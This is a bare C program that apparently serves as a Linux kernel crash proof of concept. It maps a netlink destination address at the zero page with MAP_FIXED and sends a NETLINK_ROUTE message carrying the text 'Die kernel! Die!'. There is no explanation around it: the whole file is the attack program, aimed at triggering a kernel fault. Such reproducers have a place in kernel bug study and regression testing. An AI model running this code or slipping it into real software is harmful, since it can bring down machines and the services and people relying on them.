#include <stdio.h>
#include <stdlib.h>
#include <memory.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <linux/netlink.h>

#define PAYLOAD 1024

int main(void)
{
	struct sockaddr_nl src_addr;
	struct sockaddr_nl *dest_addr;
	struct nlmsghdr *nlh = NULL;
	struct iovec iov;
	struct msghdr msg;
	int fd;

	memset(&msg, 0, sizeof(msg));

	fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
	if (fd < 0) {
		perror("socket:");
		return -1;
	}

	dest_addr = mmap(0, sizeof(*dest_addr), PROT_READ|PROT_WRITE,
			MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
	if (dest_addr == MAP_FAILED) {
		perror("mmap:");
		close(fd);
		return -1;
	}

	memset(&src_addr, 0, sizeof(src_addr));
	src_addr.nl_family = AF_NETLINK;
	src_addr.nl_pid = getpid();

	bind(fd, (struct sockaddr*)&src_addr, sizeof(src_addr));

	memset(dest_addr, 0, sizeof(*dest_addr));
	dest_addr->nl_family = AF_NETLINK;
	dest_addr->nl_pid = 0;
	dest_addr->nl_groups = 0;

	nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(PAYLOAD));
	memset(nlh, 0, NLMSG_SPACE(PAYLOAD));
	nlh->nlmsg_len = NLMSG_SPACE(PAYLOAD);
	nlh->nlmsg_pid = getpid();
	nlh->nlmsg_flags = 0;

	strcpy(NLMSG_DATA(nlh), "Die kernel! Die!");

	iov.iov_base = (void *)nlh;
	iov.iov_len = nlh->nlmsg_len;
	msg.msg_name = dest_addr;
	msg.msg_namelen = sizeof(*dest_addr);
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;

	if (sendmsg(fd, &msg, 0) < 0) {
		perror("sendmsg:");
		close(fd);
		return -1;
	}

	close(fd);
	return 0;
}